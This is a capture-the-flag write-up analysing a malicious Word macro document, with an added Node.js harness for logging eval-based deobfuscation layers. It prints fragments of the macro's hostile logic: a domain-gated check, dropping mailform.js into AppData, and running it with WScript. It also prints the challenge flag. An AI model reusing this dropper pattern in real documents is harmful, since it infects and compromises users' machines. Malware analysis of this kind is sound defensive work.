Game Invitation Writeup
Cyber Apocalypse 2024
Solved by : thewhiteh4t
- The challenge describes receiving a malicious `docm` file in an email
- We solved the challenge using Windows and MS Office 2016
- We inspected the macros in the document and here is a brief flow:
  - it checks for host domain and proceeds if it matches
    ```vb
    chkDomain = "GAMEMASTERS.local"
    strUserDomain = Environ$("UserDomain")
    If chkDomain <> strUserDomain Then
    ```
  - opens the current document in binary mode
    ```vb
    Open (ActiveDocument.FullName) For Binary As #gIvqmZwiW
    ```
  - uses regex to match a set pattern
    ```vb
    SwMbxtWpP = StrConv(CbkQJVeAG, vbUnicode)
    Dim N34rtRBIU3yJO2cmMVu, I4j833DS5SFd34L3gwYQD
    Dim vTxAnSEFH
    Set vTxAnSEFH = CreateObject("vbscript.regexp")
    vTxAnSEFH.Pattern = "sWcDWp36x5oIe2hJGnRy1iC92AcdQgO8RLioVZWlhCKJXHRSqO450AiqLZyLFeXYilCtorg0p3RdaoPa"
    Set I4j833DS5SFd34L3gwYQD = vTxAnSEFH.Execute(SwMbxtWpP)
    ```
  - gets `AppData` dir path and writes `mailform.js`
    ```vb
    kWXlyKwVj = Environ("appdata") & "\Microsoft\Windows"
    Set aMUsvgOin = CreateObject("Scripting.FileSystemObject")
    If Not aMUsvgOin.FolderExists(kWXlyKwVj) Then
        kWXlyKwVj = Environ("appdata")
    End If
    Set aMUsvgOin = Nothing
    Dim K764B5Ph46Vh
    K764B5Ph46Vh = FreeFile
    IAiiymixt = kWXlyKwVj & "\" & "mailform.js"
    ```
  - uses `wscript` to run `mailform.js`
    ```vb
    Set R66BpJMgxXBo2h = CreateObject("WScript.Shell")
    R66BpJMgxXBo2h.Run """" + IAiiymixt + """" + " vF8rdgMHKBrvCoCp0ulm"
    ```

  - finally it runs clean up and deletes `mailform.js`
- First we can modify the domain check to bypass that condition
  ```vb
  chkDomain = "GAMEMASTERS.local"
  ' strUserDomain = Environ$("UserDomain")   ' original
  strUserDomain = "GAMEMASTERS.local"        ' simply replace it with the domain
  If chkDomain <> strUserDomain Then
  ```
- In the `mailform.js` file we can add one extra statement to print the output of the function just before it hits `eval`, as highlighted below:

- Now we can use `cscript`, which is a CMD alternative of `wscript`, to read the output it will print:

- In the noise we can see a `cookie` being sent with a base64 string
> echo "SFRCe200bGQwY3NfNHIzX2czdHQxbmdfVHIxY2tpMTNyfQo=" | base64 -d
> HTB{m4ld0cs_4r3_g3tt1ng_Tr1cki13r}
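
The print-before-`eval` step and the base64 decode above, generalized as an added example for Node.js (not code from the challenge or from this writeup): the script runs with `eval` shadowed by a recorder, so each layer is logged instead of being handed to the real `eval`, and base64 strings in the layers are decoded. `captureEvalLayers`, `decodeBase64Strings`, `inert` and the two-layer sample are all constructed for illustration; the real `mailform.js` is not reproduced.

```javascript
// Added example. ASSUMPTION: run only in a disposable analysis VM; shadowing
// eval is a logging aid, not a sandbox (code outside eval still executes).

// Inert stand-in for WScript/ActiveXObject: any property, call or `new` returns it.
const inert = new Proxy(function () {}, {
  get: (_, key) => (key === Symbol.toPrimitive ? () => '' : inert),
  apply: () => inert,
  construct: () => inert,
});

// Run `source` with eval shadowed by a recorder. Each recorded payload is re-run
// the same way (up to maxDepth) so nested eval() layers are captured as well.
function captureEvalLayers(source, maxDepth = 5) {
  const layers = [];
  const run = (code, depth) => {
    const recorder = (payload) => {
      layers.push(String(payload));
      if (depth < maxDepth) run(String(payload), depth + 1);
    };
    try {
      // Function-constructor bodies are sloppy mode, so a parameter may be named eval.
      new Function('eval', 'WScript', 'ActiveXObject', code)(recorder, inert, inert);
    } catch (err) {
      // The layer needs host objects this harness does not emulate; keep what we have.
    }
  };
  run(source, 1);
  return layers;
}

// Decode base64-looking tokens found in the layers; keep printable, unique results.
function decodeBase64Strings(layers) {
  const found = new Set();
  for (const token of layers.join('\n').match(/[A-Za-z0-9+\/]{20,}={0,2}/g) || []) {
    const text = Buffer.from(token, 'base64').toString('utf8');
    if (/^[\x20-\x7e]+$/.test(text)) found.add(text);
  }
  return [...found];
}

// Constructed two-layer sample (NOT the challenge's mailform.js or its data).
const SECRET = Buffer.from('constructed-demo-value').toString('base64');
const inner = `var h = new ActiveXObject("MSXML2.XMLHTTP"); h.setRequestHeader("Cookie", "id=${SECRET}");`;
const middle = `eval(${JSON.stringify(inner)});`;
const SAMPLE = `var c=[${[...middle].map((ch) => ch.charCodeAt(0) ^ 7)}],s="";` +
  'for(var i=0;i<c.length;i++)s+=String.fromCharCode(c[i]^7);eval(s);';

console.log(captureEvalLayers(SAMPLE));
console.log(decodeBase64Strings(captureEvalLayers(SAMPLE)));
```

A script that depends on its command-line argument, such as the one the macro passes in its `Run` call, needs `WScript.Arguments` emulated with that value rather than left inert.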